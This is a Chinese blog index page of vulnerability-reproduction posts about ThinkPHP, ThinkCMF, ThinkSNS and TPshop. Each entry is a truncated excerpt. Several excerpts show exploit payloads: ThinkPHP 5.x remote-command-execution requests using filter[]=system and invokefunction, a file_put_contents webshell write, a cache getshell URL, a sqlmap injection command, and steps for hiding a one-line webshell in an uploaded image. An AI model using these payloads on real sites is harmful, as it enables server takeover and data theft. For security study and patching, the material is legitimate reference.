漏洞复现-Linux实验室

Logo

  • 发布于:2022-05-16

    1

    ThinkCMF 缓存Getshell
    影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2     复现过程 常规操作 http://www.0-sec.org/index.php?a=display&templateFile=README.md&content=%3C?php%2...
    阅读 26 评论 0
  • 发布于:2022-05-16

    1

    ThinkSNS V4 后台任意文件下载...
    漏洞分析 存在漏洞代码ts4appsadminLibActionUpgradeAction.class.php中的一个函数中。 public function step1() {     $downUrl = $_GET['upurl'];     $downUrl = urldecode($downUrl); &nb...
    阅读 30 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 专用shell
    漏洞简介 基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器,直接写一句话可能会有解析问题导致无法执行指令,研究了一下把一句话套入框架控制器的方法,分享给大家参考,     复现过程 在index的控制器文件夹下建立Test.php文件,代码如下: <?php namespace appindexcontroller; class T...
    阅读 36 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp Shop后门CVE-2...
    漏洞简介 该漏洞源于/vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php可以将文件下载到其他服务器上。远程攻击者可利用该漏洞获取敏感信息,并可能执行命令。     影响版本 Backdoor in Tpshop <= 2.0...
    阅读 39 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp Shop 供应商后台本...
    复现过程 1、用户个人资料修改处上传图片 http://www.0-sec.org/Home/User/info.html 2、上传一张正常图片,并在图片末尾加上一句话 3、返回shell http://www.0-sec.org/supplier/order/delivery_print?template=public/upload/user/4575/head_pic/5989ee...
    阅读 31 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp Shop前台SQL注入...
    复现过程 http://www.0-sec.org/mobile/index/index2/id/1' sqlmap -u "http://www.0-sec.org/mobile/index/index2/id/1*" --random-agent --batch --dbms "mysql" --  
    阅读 35 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 3.x order b...
    漏洞简介 ThinkPHP在处理order by排序时,当排序参数可控且为关联数组(key-value)时,由于框架未对数组中key值作安全过滤处理,攻击者可利用key构造SQL语句进行注入,该漏洞影响ThinkPHP 3.2.3、5.1.22及以下版本。     影响版本 ThinkPHP 3.2.3、5.1.22及以下版本。     漏洞分析 Think...
    阅读 23 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 3.2.3 缓存漏洞
    影响版本 Thinkphp 3.2.3     漏洞分析 直接跟进到/Library/Think/Cache/File.class.php文件,看到set方法: /** 写入缓存 @access public @param string $name 缓存变量名 @param mixed $value 存储数据 @param int $expire 有效时间 0为永久...
    阅读 23 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 3.2.3 updat...
    漏洞简介 thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其中Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程中在update更新数据的过程中存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。     影响版本 Thin...
    阅读 23 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 3.2.3 selec...
    影响版本 Thinkphp 3.2.3     漏洞分析 通过github上的commit 对比其实可以粗略知道,此次更新主要是在ThinkPHP/Library/Think/Model.class.php文件中,其中对于delete,find,select三个函数进行了修改。 delete函数 select函数 find函数 对比三个方法修改的地方都...
    阅读 24 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 3.1.3 sql注入...
    影响版本 Thinkphp 3.1.3     复现过程 首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现 在ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成...
    阅读 24 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.0.8 远程命令执...
    复现过程 http://wwww.0-sec.org/public _method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo _method=__construct&method=get&filter[]=call_user_fu...
    阅读 26 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.0.9 远程命令执...
    复现过程 www.0-sec.org/?s=index/index POST s=whoami&_method=__construct&method=POST&filter[]=system aaaa=whoami&_method=__construct&method=GET&filter[]=system _method=__constr...
    阅读 13 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.1.18 远程命令...
    1、常规poc http://www.xxxxx.com/?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=index11.php&vars[1][1]=<?=file_put_contents('in...
    阅读 13 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.1.29 远程命令...
    1、代码执行 http://www.0-sec.org/?s=index/thinkRequest/input&filter=phpinfo&data=1 http://www.0-sec.org/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&...
    阅读 19 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.1.x SQL注入...
    漏洞简介 在ThinkPHP5.1.23之前的版本中存在SQL注入漏洞,该漏洞是由于程序在处理order by 后的参数时,未正确过滤处理数组的key值所造成。如果该参数用户可控,且当传递的数据为数组时,会导致漏洞的产生。     影响版本 ThinkPHP < 5.1.23     环境搭建 1.下载安装thinkphp5.1.x 对于thinkp...
    阅读 32 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.0.24 mysq...
    漏洞简介 Thinkphp 5.0.24 在开启debug的模式下,可通过高线程爆破mysql导致tp报错泄露mysql账号密码。     影响版本 Thinkphp 5.0.24     复现过程 利用条件: 开启debug模式 mysql开启外连 通过MySQL爆破工具,来建立大量链接 连接数到达一定的程度以后就会抛出错误 导...
    阅读 22 评论 0
  • 发布于:2022-05-16

    1

    Thinkphp 5.0.5 缓存漏洞
    漏洞影响 Thinkphp 5.0.5     漏洞分析 漏洞代码与3.2.3差不多,不一样的在缓存目录   protected function getCacheKey($name) { $name = md5($name); if ($this->options['cache_subdir']) { // 使用子目录 $name = sub...
    阅读 21 评论 0
  • 发布于:2022-05-16

    1

    ThinkPHP 5.1.25 inse...
    漏洞详情 条件:传入上面方法的参数数组,用户可控数组的键值(说到这里,了解tp的其实应该知道是什么原因了,就是sql语句中的字段名可控导致的注入),在实际利用的时候还要知道表的一个字段名。     影响版本 ThinkPHP 5.1.25 影响方法:insert、insetAll、update     漏洞分析 thinkphplibraythinkdbB...
    阅读 15 评论 0
  • 发布于:2022-05-16

    1

    ThinkPHP5 聚合查询注入SQL注...
    漏洞概要 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。     漏洞影响版本 5.0.0<=ThinkPHP<=5.0.21 5.1.3<=ThinkPHP5<=5.1.25 不同版本 payload 需稍作调整 5.0.0~5.0.21、 5....
    阅读 15 评论 0